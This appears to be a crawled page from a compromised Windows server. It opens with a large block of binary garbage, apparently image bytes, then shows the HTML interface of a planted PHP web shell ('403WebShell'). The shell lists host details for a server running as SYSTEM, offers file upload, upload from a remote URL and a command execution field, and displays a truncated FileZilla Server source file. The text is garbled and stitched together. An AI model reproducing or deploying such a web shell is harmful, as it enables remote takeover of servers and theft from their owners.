�mˊ�;�@O��jE��j(�ا,��LX���LO���Ц�90�O�.����a��nA���7������j4 ��W��_ٓ�
��zW�jcB������y՗+EM�)d���N�g6�y1_x��p�$Lv :��9�"z��p���ʙ$��^��JԼ*�ϭ����o���=x�Lj�6�J��u82�A�H�3$�ٕ@�=Vv�]�'�qEz�;I˼��)��=��ɯ���x�/�W(V���p�����$
�m�������u�����񶤑Oqˎ�T����r��㠚x�sr�GC��byp�G��1ߠ�w e�8�$⿄����/�M{*}��W�]˷.�CK\�ުx���/$�WP w���r�
|i���&�}�{�X�
�>��$-��l���?-z���g����lΆ���(F���h�vS*���b���߲ڡn,|)mrH[���a�3�ר�[1��3o_�U�3�TC�$��(�=�)0�kgP���� ��u�^=��4 �WYCҸ:��vQ�ר�X�à��tk�m,�t*��^�,�}D*� �"(�I��9R����>`�`��[~Q]�#af��i6l��8���6�:,s�s�N6�j"�A4���IuQ��6E,�GnH��zS�HO�uk�5$�I�4��ؤ�Q9�@��C����wp �BGv[]�u�Ov��� 0I4���\��y�����Q�Ѹ��~>Z��8�T��a��q�ޣ;z��a���/��S��I:�ܫ_�|������>=Z����8:�S��U�I�J��"IY���8%b8���H��:�QO�6�;7�I�S��J��ҌAά3��>c���E+&jf$eC+�z�;��V�����
�r���ʺ������my�e���aQ�f&�
�6�ND ��.:��NT�vm�<-
u���ǝ\MvZY�N�NT��-A�>jr!S��n�O1�3�Ns�%�3D@���`������ܟ1�^c<�����a�ɽ�̲
�Xë#�w�|y�cW�=�<ITS�1�G]�b��I&�"B#E,�N` �l¡/'Pi��Ey�I���h���H�YH�A͑|4Z�A�����Q��>9I*H8�p�^(4���՗�k��arOcW�tO�\�ƍR��8����'�K���I�Q�����?5�>[�}��yU�ײ
-h��=��%	q�ThG�2�)���"ו3]�!kB��*p�FDl�A���,�eEi�H�f�Ps�����5�H:�Փ~�H�0Dت�D�I����h�F3�������c��2���E��9�H��5�zԑ�ʚ�i�X�=:m�xg�hd(�v����׊�9iS��O��d@0ڽ���:�p�5�h-��t�&���X�q�ӕ,��ie�|���7A�2���O%P��E��htj��Y1��w�Ѓ!����	����	ࢽ��My�7�\�a�@�ţ�J
 �4�Ȼ�F�@o�̒<D�Xw���j}�G}9���j{C�<F2�?!x� <�x�=
�K#jU��k��3sr�4�*�\3���T�s�#�Eu y�I���{���F'��_�f���
�.���c|�TP���z�~�%6���`�v����e*wD�O�˞ᐌN�
E�u�|̧hj����G: ��m{�<��SL�xS��4�(��Օ� ��
�#�t�gS�W�6�*E�
:E�QSá|�"�W_$����G���D�}�N~�wQME�c�؁����մs��s�\I�hU��#m� oJ��.�J�٭J��I�Z؂R�`C��Bۇ]�^Y;
Tѓ/.^�4�� 5�" ����ӭ�ҟ4��G ����І���jh�{l�oo�]N���a�+�ygm�.dY�!-W����աFnL��
>?4�wx��)��]�P��~�����u�����5�����7X�
�9��^ܩ�U;Iꭆ
5
�������eK2�7(�{|��Y׎
�V��\"���Z�1�
Z�����}��(�Ǝ"�1S���_�vE30>���p;�ΝD��%x�W�?W?v����o�^V�i�d��r[��/&>�~`�9Wh��y�;���R�� �;;ɮT��?����r$�g1�K����A��C��c��K��l:
�'��3
c�ﳯ*"t8�~l��)���m��+U,z��`( �>yJ�?����h>��]��v��ЍG*�{`��;y]��I�T�;c��NU�fo¾h���/$���|NS
���1�S�"�H��V���T���4��u
hǜ�]�v;���5�͠x��'C\�SBpl���h}�N����� A�Bx���%��ޭ�l��/����T��w�ʽ]D�=����K���ž�r㻠l4�S�O?=�k
�M:�
��c�C�a�#ha���)�ѐxc�s���gP�iG�� {+���x
���Q���I=	��
z��ԫ+
�8"�k�ñ�j=|��
��c
��y��CF��/ ��*9ж�h{
�?4�o���k�m�Q�N�x��;�Y��4膚�
a�w?�6�> e]�����Q�r�:����g�,i"�����ԩA� *M�<�G��b�if��l^M��5� �Ҩ�{����6J��ZJ�����P�*�����Y���ݛu�_4�9�I8�7���������,^ToR���m4�H��?�N�S�ѕw��/S��甍�@�9H�S�T��t�ƻ���ʒU��*{Xs�@����f��� ��֒Li�K{H�w^���������Ϥm�tq���s�
���ք��f:��o~s��g�r��ט�
�S�ѱC�e]�x���a��) ���(b-$(�j>�7q�B?ӕ�F��h<y�ci M�����Jc�����z�Nݝ:�ΧX����&]�+�\�T�F�4���@�+��
�ןO�׵���?�s�q8���(Y��Ʊ���*�RM��g�Ow0=g`��ښ�=�� 9���#�������o��m�r?���G񶨯�ǘ8��N�t1�%��<찘��5��?*�C�9�v����:�9��9?[�}~����a���)e�G+Ü�t(�N��JFm��e��[��P1'`�h% 4ﶹ�p�m�<��g=�۹��aa��x>V25r[7
Y�}L�R��}����*sg+��x�r�2�U=�*'WS��ZDW]�WǞ�<��叓���{�$�9Ou4��y�90-�1�'*D`�c�^o?(�9��u���ݐ��'PI&�
f�Jݮ�������:wS����jfP1F:X�H�9dԯ�� �˝[�_54�}*;@�ܨ
��	ð�yn�T���?�ןd�#���4rG�ͨ��H�1�|-#���Mr�S3��G�3�����)�.᧏3v�z֑��r����$G"�`j
�1t��x0<Ɔ�Wh6�y�6��,œ�Ga��gA����y��b��)� �h�D��ß�_�m��ü�gG;��e�v��ݝ�nQ�
��C����-�*��o���y�a��M��I�>�<���]obD��"�:���G�A��-\%LT�8���c�)��+y76���o�Q�#*{�(F�⽕�y����=���rW�\p<yۚQ��bz�To����}��TT�Qqs�,s�vm盭��]���	����l�A�q�T<4p�p�b��U��Q�}�Y@�uZH��
0n�����~�b|U�9/-�y#��@�7��]gxZ�Ո�ʟ�a���q�cÜ���M�r�u�r��#'PŻiՑ���o9���Y�����1;�s�����װ��/M"�3��hnt�T`UO��Xz�c�3�g��Cn"���m�e?�B�����9T�����ZW.�Y&�*GK�F��ݥz��q	�����ܧ�TNh#f�D���ᰎn�����}�fQ������69���ZL�C{�/P�̪(@a�[�11��^��J�F5s��T�ֺB��ŠW�~= ���X��.�������_#����*�v�9�*֕�N�;AÛ�5f`pi5n�Ֆb������:�m���ĦiV?�.j,�C
��-"��1��D)���`Ѭى,�jI9�ʈ����P����6��$u{�J��w��n4�Dm�m���y��}]���h�)ɹ#R#�΢ن���TZ���k�	����h(xe�G/�������EA��fQBA���?x���bk�T-���y4Ƈy��ИQ���4�3yk�Z&&�x�N�?Y
}�.��{lt��u����psm}Cfs�i
Y�v��/�ZH*1XG�8��GF��u�
SZ�#�{&#JȺ[H���su�^53�	��ݜf f讥]`��m���}h�=Xo,a����Ѣ�*����×^KJ1H~-�;,��Ƥ�d���D��B=
ƥ����ue�(�D�ӈF��%N5����f��8��6>���۩�c���A���^e6��K������ʐ�cVf5$�'->���ՉN"���F�"�UQ@�f��G<GZ6p�5�(tW3~�!�$�U��#�'���¿���[!���17���;OP�&)��F/w9� )�qn`��y��4��X(�c�m^X)�46� |l0 ̵����ג�����P���`�.Ԛ��7 ��Ẻ����( �D���ȃ&=���ڍ]�����Q�cՏ�ϴ���4���66q��+ԩ�e@�WYb����M
�@�`( ���eaP��Z�Y�N}��֧
�:z$��K1�I��������=јu�跄),n0`�}���^H���ӯ?C�:@��ED��NŨ;I�]E��/�9^Z��.?��JG� p9�����:�U��c�@ �mxJG�hΏ�t�k��FfS���a��V?F�*�\{-�է8�Q��_�5�tOnyUY6&�}%Ex�,ª�j�rj-��Y���~��"�g�U���X���Y��ԯE��3Tm�� I:�NU���Qw���C�ߛ�L(�H��u���d�]Ǽ����4���G�S���Y�&n[
$�A����2L��`6>b~��#�&�M=��8�ט�JNu9��D��[̤�s�o�~��� ���
G��9T�tW^g5y$b��Y'��س�Ǵ�=��U-2	#�MC�t(�i�	�lj�@Q
5�̣i�*�O����s�x�K�f��}\��M{E�V�{�υ��Ƈ�����);
�H����I��fe�Lȣr�2��>��W� I�Ȃ6������i��k���5�YOxȺ����>��Y�f5'��|��H+��98pj�n�.O�y�������jY��~��i�w'������l�;�s�2��Y��:'lg�ꥴ)o#'Sa�a�K��Z��m��}�`169�n���"���x��I ��*+�	
}F<��c���F�P�������
ֹ*�PqX�x۩��,�	��N��
�4<-����%����:��7����W���u�`����� $�?�I��&����o��o��`v�>��P��"��l���4��5'�Z�gE���8���?��[�X�7(��.Q�-��*���ތL@̲����v��.5���[��=�t\+�CNܛ��,g�SQnH����}*F�G16���&:�t��4ُ"A��̣��$�b �|����#rs��a�����T��]�<�j��B S�('$�ɻ�
�wP;�/�n��?�ݜ��x�F��yUn�~mL*-�������Xf�wd^�a�}��f�,=t�׵i�.2/wpN�Ep8�OР���•��R�FJ�	
55TZ��T
�ɭ�<��]��/�0�r�@�f��V��V����Nz�G��^���7hZi����k��3�,kN�e|�vg�1{9]_i��X5y7�
8e]�U����'�-2,���e"����]ot�I��Y_��n�(JҼ��1�O]bXc���Nu�No��pS���Q_���_�?i�~�x h5d'�(qw52]	��'ޤ�q��o1�R!���`ywy�A4u���h<קy���\[~�4�\ X�Wt/�	6�����n�F�a8��f���z
�3$�t(���q��q�x��^�XWeN'p<-v�!�{�(>ӽDP7��ո0�y)�e$ٕv�Ih'Q�EA�m*�H��RI��=:������4牢) �%_iN�ݧ�l]�	�Nt���G��H�L��
�
ɱ�g<���1V�,�J~�ٹ�"K��Q�� 9�HS�9�?@��k����r�;we݁�]I�!{
�@�G�[�"��`�
��J:�n]�{�cA�E����V��ʆ���#��U9�6����j�#Y�m\��q�e4h�B�7��C�������d<�?J����1g:ٳ���=Y���D�p�ц�׈ǔ��1�]26؜oS�'��9�V�FVu�P�h�9�x
c�oq�X��p�o�5��Ա5$�9W�V(�[Ak�aY錎qf;�'�[�|���b�6�Ck��)��#a#a˙��8���=äh�4��2��C��4tm^ �n'c� ��]GQ$[Wҿ��i���vN�{Fu��1�gx��1┷���N�m��{j-,��x��
Ūm�ЧS�[�s���Gna���䑴�
�
x�p8<������97�Q���ϴ�v�aϚG��Rt�Һ׈�f^\r��WH�JU�7Z���y)�vg=����n��4
�_)y��D'y�6�]�c�5̪ �\�
�PF�k����&�c;��cq�$~T�7j
���nç]�<�g	":�to�t}�159�<�/�8������m�b�K#g'I'.W����� 6��I/��>v��\�MN��g���m�A�yQL�4u�Lj�j9��#44�t��l^�}L����n��R��!��t��±]��r��h6ٍ>�yҏ�N��fU��	����Fm@�8}�/u��jb9������he:A�y�ծw��GpΧh�5����l}�3p468��)U��d��c���
�;Us/�֔�YX�1�O2��uq�s��`hwg�r~�{R��mhN��؎*q42�*th��>�#���E����#��Hv�O����q�}����� 6�e��\�,Wk�#���X��b>��p}�դ��3���T5��†��6��[��@ �P�y*n��|'f�֧>�lư΂�̺����SU�'*�q�p�_S�����M��	'��c�6��� ��m��ySʨ;M��r���Ƌ�m�Kxo,���Gm�P��A�G�:��i��w�9�}M(�^�V��$ǒ�ѽ�9���|���� �a����J�SQ�a���r�B;����}���ٻ֢�2�%U���c�#�g���N�a�ݕ�'�v�[�OY'��3L�3�;,p�]@�S��{ls��X�'���c�jw� k'
a�.��}�}&��
�dP�*�bK=ɍ!����;3n�gΊU�ߴmt�'*{,=SzfD�
A��ko~�G�aoq�_mi}#�m�������P�Xhύ��� �mxǍ�΂���巿zf��Q���c���|kc�����?���W��Y�$���_Lv����l߶��c���`?����l�j�ݲˏ!V��6����U�Ђ(A���4y)H���p�Z_�x��>���e�� R��$�/�`^'3qˏ�-&Q�=?��CFVR
�D�fV�9��{�8g�������n�h�(P"��6�[�D���<
E�����~0<@�`�G�6����Hг�cc��
�c�K.5��D��d�B���`?�XQ��2��ٿyqo&+�1^�DW�0�ꊩ���G�#��Q�nL3��c���������/��x
��1�1 [y�x�პCW��C�c�UĨ80�m�e�4.{�m��u���I=��f�����0QRls9���f���������9���~f�����Ǩ��a�"@�8���ȁ�Q����#c�ic������G��$���G���r/$W�(��W���V�"��m�7�[m�A�m����bo��D�j����۳�l���
^�k�h׽�����
��#�iXn�v��eT�k�a�^Y�4�BN�� ĕ�� 0 
     
  !01@Q"2AaPq3BR������ 


? � ��@4�Q�����T3,���㺠�W�[=JK�Ϟ���2�r^7��vc�:�9�E�ߴ�w�S#d���Ix��u��:��Hp��9E!��
V2;73|F��9Y���*ʬ�F��D����u&���y؟��^EA��A��(ɩ���^��GV:ݜDy�`��Jr29ܾ�㝉��[���E;Fzx��YG��U�e�Y�C����	����v-tx����I�sם�Ę�q��Eb�+P\	:>�i�C'�;�����k|z�رn�y]�#ǿb��Q��������w�����(�r|ӹs��[�D��2v-%��@;�8<a���[\o[ϧw��I!��*0�krs)�[�J9^��ʜ��p1)�	"��/_>��o��<1����A�E�y^�C�
�`�x1'ܣn�p��s`l���fQ��):�l����b>�Me�jH^?�kl3(�z:���1ŠK&?Q�~�{�ٺ�h�y���/�[��V�|6��}�KbX����mn[-��7�
5q�94�������dm���c^���h�
X��5��<�eޘ>G���-�}�دB�ޟ�
��|�rt�M��V+�]�c?�-#ڛ��^ǂ}���Lkr���O��u�>�-D�ry�D?:ޞ�U��ǜ�7�V��?瓮�"�#���r��չģVR;�n���/_�؉v�ݶe5d�b9��/O��009�G���5n�W����JpA�*�r9�>�1��.[t���s
�F���nQ�
V77R�]�ɫ8����_0<՜�IF�u(v��4��F�k�3��E)��N:��yڮe��P�`�1}�$WS��J�SQ�N�j 
�ٺ��޵�#l���ј(�5=��5�lǏmoW�v-�1����v,W�mn��߀$x�<����v�j(����c]��@#��1������Ǔ���o'��u+����;G�#�޸��v-lη��/(`i⣍Pm^� ��ԯ̾9Z��F��������n��1�����]�[��)�
'������ :�֪�W��FC�
����	�B9،!?���]��V��A�Վ�M��b�w��G
F>_DȬ0¤�#�QR�[V��kz���m�w�"��9ZG�7'[��=�Q����j8R?�zf�\a�=��O�U����*oB�A�|G���2�54
�p��.w7�
��
 ��&������ξxGHp�B%��$g�����t�Џ򤵍z���HN�u�Я�-�'4��0�� ;_�� 3 

     
  !01"@AQa2Pq#3BR������ 


? � �ʩca��en��^��8���<�u#��m*08r��y�N"�<�Ѳ0��@\�p���	�����Kv�D��J8�Fҽ�
�f�Y��-m�ybX�NP����}�!*8t(�OqѢ��Q�wW�K��ZD��Δ^e��!� ��B�K��p~�����e*l}z#9ң�k���q#�Ft�o��S�R����-�w�!�S�
��Ӥß|M�l޶V��!eˈ�8Y���c�ЮM2��tk����
������J�fS����Ö*i/2�����n]�k�\���|4yX�8��U�P.���Ы[���l��@"�t�<������5�lF���vU�����W��W��;�b�cД^6[#7@vU�xgZv��F�6��Q,K�v��� �+Ъ��n��Ǣ��Ft���
8��0��c�@�!�Zq
s�v�t�;#](B��-�nῃ~���3g������5�J�%���O������n�kB�ĺ�.r��+���#�N$?�q�/�s�6��p��a����a��J/��M�8��6�ܰ"�*������ɗud"\w���aT(����[��F��U՛����RT�b���n�*��6���O��SJ�.�ij<�v�MT��R\c��5l�sZB>F��<7�;EA��{��E���Ö��1U/�#��d1�a�n.1ě����0�ʾR�h��|�R��Ao�3�m3
��%�� ���28Q� 
��y��φ���H�To�7�lW>����#i`�q���c����a����m,B�-j����݋�'mR1Ήt�>��V��p���s�0IbI�C.���1R�ea�����]H�6�������� ��4B>��o��](��$B���m�����a�!=� �?�B�
K�Ǿ+�Ծ"�n���K��*��+��[T#�{ E�J�S����Q�
����s�5�:�U�\wĐ�f�3����܆&�)��� �I���Ԇw��E	T�lrTf6Q|R�h:��[K��
�z��c֧�G�C��%\��_�a �84��HcO�bi��ؖV��7H
�)*ģK~Xhչ0��4?�0���
�E<���}3
���#���u�?��
��|g�S�6ꊤ�|�I#Hڛ�	�ա��w�X��9��7�
��Ŀ%�SL��y6č��|�F�a8���b� �$�sק�h���b9RAu7�˨p�Č�_\*w��묦��F����4D~�f����|(�"m���NK��i�S�>�$d7SlA�
�/�²����SL��|6N�}���S�˯���g��]6��;�#�.��<���q'Q�1|KQ$�����񛩶"�$r�b:���N8�w@��8$��
�AjfG|~�9F���Y��ʺ��Bwؒ������M:I岎�G��`s�YV5����6��A �b:�W���G�q%l�����F��H���7�������Fsv7� �k��
<html>
<!doctypehtml><html><head><title>403WebShell</title><meta content="noindex"name="robots"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee" size="5">403Webshell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=#df5>127.0.0.1</font> &nbsp;/&nbsp; Your IP : <font color=#df5>10.100.1.254</font><br>Web Server : <font color='#df5'>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30</font><br>System : <font color='#df5'>Windows NT WIZC-EXTRANET 10.0 build 19045 (Windows 10) AMD64</font><br>User : <font color='#df5'>SYSTEM&nbsp;</font>( <font color='#df5'>0</font>)<br>PHP Version : <font color='#df5'>8.0.30</font><br>Disable Function : <font color='#df5'>NONE</font></font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=red>OFF</font> &nbsp;|&nbsp; Perl : <font color=red>OFF</font> &nbsp;|&nbsp; Python : <font color=red>OFF</font> &nbsp;|&nbsp; Sudo : <font color=red>OFF</font> &nbsp;|&nbsp; Pkexec : <font color=red>OFF</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/xampp">xampp</a>/<a href="?loknya=/xampp/FileZillaFTP">FileZillaFTP</a>/<a href="?loknya=/xampp/FileZillaFTP/source">source</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='green'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='green'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://linuxploit.com/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="kerang.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/admin/upload/files/algoritma.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /xampp/FileZillaFTP/source/Permissions.cpp</tr></td></table><br/><pre>// FileZilla Server - a Windows ftp server

// Copyright (C) 2002-2004 - Tim Kosse &lt;tim.kosse@gmx.de&gt;

// This program is free software; you can redistribute it and/or
// modify it under the terms of the GNU General Public License
// as published by the Free Software Foundation; either version 2
// of the License, or (at your option) any later version.

// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.

// You should have received a copy of the GNU General Public License
// along with this program; if not, write to the Free Software
// Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.

// Permissions.cpp: Implementierung der Klasse CPermissions.
//
//////////////////////////////////////////////////////////////////////

#include &quot;stdafx.h&quot;
#include &quot;misc\md5.h&quot;
#include &quot;Permissions.h&quot;
#include &quot;tinyxml/tinyxml.h&quot;
#include &quot;xml_utils.h&quot;
#include &quot;options.h&quot;
#include &quot;iputils.h&quot;

#ifdef _DEBUG
#undef THIS_FILE
static char THIS_FILE[]=__FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CPermissionsHelperWindow

class CPermissionsHelperWindow
{
public:
	CPermissionsHelperWindow(CPermissions *pPermissions)
	{
		ASSERT(pPermissions);
		m_pPermissions = pPermissions;

		//Create window
		WNDCLASSEX wndclass;
		wndclass.cbSize = sizeof wndclass;
		wndclass.style = 0;
		wndclass.lpfnWndProc = WindowProc;
		wndclass.cbClsExtra = 0;
		wndclass.cbWndExtra = 0;
		wndclass.hInstance = GetModuleHandle(0);
		wndclass.hIcon = 0;
		wndclass.hCursor = 0;
		wndclass.hbrBackground = 0;
		wndclass.lpszMenuName = 0;
		wndclass.lpszClassName = _T(&quot;CPermissions Helper Window&quot;);
		wndclass.hIconSm = 0;

		RegisterClassEx(&amp;wndclass);

		m_hWnd=CreateWindow(_T(&quot;CPermissions Helper Window&quot;), _T(&quot;CPermissions Helper Window&quot;), 0, 0, 0, 0, 0, 0, 0, 0, GetModuleHandle(0));
		ASSERT(m_hWnd);
		SetWindowLongPtr(m_hWnd, GWLP_USERDATA, (LONG)this);
	};

	virtual ~CPermissionsHelperWindow()
	{
		//Destroy window
		if (m_hWnd)
		{
			DestroyWindow(m_hWnd);
			m_hWnd = 0;
		}
	}

	HWND GetHwnd()
	{
		return m_hWnd;
	}

protected:
	static LRESULT CALLBACK WindowProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
	{
		if (message==WM_USER)
		{
			/* If receiving WM_USER, update the permission data of the instance with the permission
			 * data from the global data
			 */

			// Get own instance
			CPermissionsHelperWindow *pWnd=(CPermissionsHelperWindow *)GetWindowLongPtr(hWnd, GWLP_USERDATA);
			if (!pWnd)
				return 0;
			if (!pWnd-&gt;m_pPermissions)
				return 0;
	
			EnterCritSection(pWnd-&gt;m_pPermissions-&gt;m_sync);
	
			// Clear old group data and copy over the new data
			pWnd-&gt;m_pPermissions-&gt;m_GroupsList.clear();
			for (CPermissions::t_GroupsList::iterator groupiter=pWnd-&gt;m_pPermissions-&gt;m_sGroupsList.begin(); groupiter!=pWnd-&gt;m_pPermissions-&gt;m_sGroupsList.end(); groupiter++)
				pWnd-&gt;m_pPermissions-&gt;m_GroupsList.push_back(*groupiter);
	
			// Clear old user data and copy over the new data
			pWnd-&gt;m_pPermissions-&gt;m_UsersList.clear();
			for (CPermissions::t_UsersList::iterator iter=pWnd-&gt;m_pPermissions-&gt;m_sUsersList.begin(); iter!=pWnd-&gt;m_pPermissions-&gt;m_sUsersList.end(); iter++)
			{
				CUser user = *iter;
				user.pOwner = NULL;
				if (user.group != _T(&quot;&quot;))
				{	// Set owner
					for (CPermissions::t_GroupsList::iterator groupiter=pWnd-&gt;m_pPermissions-&gt;m_GroupsList.begin(); groupiter!=pWnd-&gt;m_pPermissions-&gt;m_GroupsList.end(); groupiter++)
						if (groupiter-&gt;group == user.group)
						{
							user.pOwner = &amp;(*groupiter);
							break;
						}
				}
				pWnd-&gt;m_pPermissions-&gt;m_UsersList.push_back(user);
			}
	
			LeaveCritSection(pWnd-&gt;m_pPermissions-&gt;m_sync);
		}
		return ::DefWindowProc(hWnd, message, wParam, lParam);
	}

protected:
	CPermissions *m_pPermissions;

private:
	HWND m_hWnd;
};

/////////////////////////////////////////////////////////////////////////////
// CPermissions

CCriticalSectionWrapper CPermissions::m_sync;
CPermissions::t_UsersList CPermissions::m_sUsersList;
CPermissions::t_GroupsList CPermissions::m_sGroupsList;
std::list&lt;CPermissions *&gt; CPermissions::m_sInstanceList;

//////////////////////////////////////////////////////////////////////
// Konstruktion/Destruktion
//////////////////////////////////////////////////////////////////////

CPermissions::CPermissions()
{
	Init();
}

CPermissions::~CPermissions()
{
	EnterCritSection(m_sync);
	std::list&lt;CPermissions *&gt;::iterator instanceIter;
	for (instanceIter=m_sInstanceList.begin(); instanceIter!=m_sInstanceList.end(); instanceIter++)
		if (*instanceIter==this)
			break;
	ASSERT(instanceIter != m_sInstanceList.end());
	if (instanceIter != m_sInstanceList.end())
		m_sInstanceList.erase(instanceIter);
	LeaveCritSection(m_sync);
	if (m_pPermissionsHelperWindow)
		delete m_pPermissionsHelperWindow;
}

void CPermissions::AddLongListingEntry(t_dirlisting *&amp;pResult, bool isDir, const char* name, const t_directory&amp; directory, __int64 size, FILETIME* pTime, const char* dirToDisplay, bool *)
{
	CFileStatus64 status;
	if (!pTime &amp;&amp; GetStatus64(directory.dir, status))
	{
		size = status.m_size;
		pTime = &amp;status.m_mtime;
	}

	unsigned int nameLen = strlen(name);

	// This wastes some memory but keeps the whole thing fast
	if ((8192 - pResult-&gt;len) &lt; (60 + nameLen))
	{
		pResult-&gt;pNext = new t_dirlisting;
		pResult = pResult-&gt;pNext;
		pResult-&gt;len = 0;
		pResult-&gt;pNext = NULL;
	}

	if (isDir)
	{
		memcpy(pResult-&gt;buffer + pResult-&gt;len, &quot;drwxr-xr-x&quot;, 10);
		pResult-&gt;len += 10;
	}
	else
	{
		pResult-&gt;buffer[pResult-&gt;len++] = '-';
		pResult-&gt;buffer[pResult-&gt;len++] = directory.bFileRead ? 'r' : '-';
		pResult-&gt;buffer[pResult-&gt;len++] = directory.bFileWrite ? 'w' : '-';

		BOOL isexe = FALSE;
		if (nameLen &gt; 4)
		{
			CStdStringA ext = name + nameLen - 4;
			ext.MakeLower();
			if (ext.ReverseFind('.')!=-1)
			{
				if (ext == &quot;.exe&quot;)
					isexe = TRUE;
				else if (ext == &quot;.bat&quot;)
					isexe = TRUE;
				else if (ext == &quot;.com&quot;)
					isexe = TRUE;
			}
		}
		pResult-&gt;buffer[pResult-&gt;len++] = isexe ? 'x' : '-';
		pResult-&gt;buffer[pResult-&gt;len++] = directory.bFileRead ? 'r' : '-';
		pResult-&gt;buffer[pResult-&gt;len++] = '-';
		pResult-&gt;buffer[pResult-&gt;len++] = isexe ? 'x' : '-';
		pResult-&gt;buffer[pResult-&gt;len++] = directory.bFileRead ? 'r' : '-';
		pResult-&gt;buffer[pResult-&gt;len++] = '-';
		pResult-&gt;buffer[pResult-&gt;len++] = isexe ? 'x' : '-';
	}

	memcpy(pResult-&gt;buffer + pResult-&gt;len, &quot; 1 ftp ftp &quot;, 11);
	pResult-&gt;len += 11;

	pResult-&gt;len += sprintf(pResult-&gt;buffer + pResult-&gt;len, &quot;% 14I64d&quot;, size);

	// Adjust time zone info and output file date/time
	SYSTEMTIME sLocalTime;
	GetLocalTime(&amp;sLocalTime);
	FILETIME fTime;
	VERIFY(SystemTimeToFileTime(&amp;sLocalTime, &amp;fTime));

	FILETIME mtime;
	if (pTime)
		mtime = *pTime;
	else
		mtime = fTime;

	TIME_ZONE_INFORMATION tzInfo;
	int tzRes = GetTimeZoneInformation(&amp;tzInfo);
	_int64 offset = tzInfo.Bias+((tzRes==TIME_ZONE_ID_DAYLIGHT)?tzInfo.DaylightBias:tzInfo.StandardBias);
	offset *= 60 * 10000000;

	_int64 t1 = ((_int64)mtime.dwHighDateTime&lt;&lt;32) + mtime.dwLowDateTime;
	t1 -= offset;
	mtime.dwHighDateTime = (DWORD)(t1&gt;&gt;32);
	mtime.dwLowDateTime = (DWORD)(t1%0xFFFFFFFF);

	SYSTEMTIME sFileTime;
	FileTimeToSystemTime(&amp;mtime, &amp;sFileTime);

	_int64 t2 = ((_int64)fTime.dwHighDateTime&lt;&lt;32) + fTime.dwLowDateTime;
	const char months[][4]={&quot;Jan&quot;, &quot;Feb&quot;, &quot;Mar&quot;, &quot;Apr&quot;, &quot;May&quot;, &quot;Jun&quot;, &quot;Jul&quot;, &quot;Aug&quot;, &quot;Sep&quot;, &quot;Oct&quot;, &quot;Nov&quot;, &quot;Dec&quot;};
	pResult-&gt;len += sprintf(pResult-&gt;buffer + pResult-&gt;len, &quot; %s %02d &quot;, months[sFileTime.wMonth-1], sFileTime.wDay);
	if (t1 &gt; t2 || (t2-t1) &gt; ((_int64)1000000*60*60*24*350))
		pResult-&gt;len += sprintf(pResult-&gt;buffer + pResult-&gt;len, &quot; %d &quot;, sFileTime.wYear);
	else
		pResult-&gt;len += sprintf(pResult-&gt;buffer + pResult-&gt;len, &quot;%02d:%02d &quot;, sFileTime.wHour, sFileTime.wMinute);

	memcpy(pResult-&gt;buffer + pResult-&gt;len, name, nameLen);
	pResult-&gt;len += nameLen;
	pResult-&gt;buffer[pResult-&gt;len++] = '\r';
	pResult-&gt;buffer[pResult-&gt;len++] = '\n';
}

void CPermissions::AddFactsListingEntry(t_dirlisting *&amp;pResult, bool isDir, const char* name, const t_directory&amp; directory, __int64 size, FILETIME* pTime, const char* dirToDisplay, bool *enabledFacts)
{
	CFileStatus64 status;
	if (!pTime &amp;&amp; GetStatus64(directory.dir, status))
	{
		size = status.m_size;
		pTime = &amp;status.m_mtime;
	}

	unsigned int nameLen = strlen(name);

	// This wastes some memory but keeps the whole thing fast
	if ((8192 - pResult-&gt;len) &lt; (76 + nameLen))
	{
		pResult-&gt;pNext = new t_dirlisting;
		pResult = pResult-&gt;pNext;
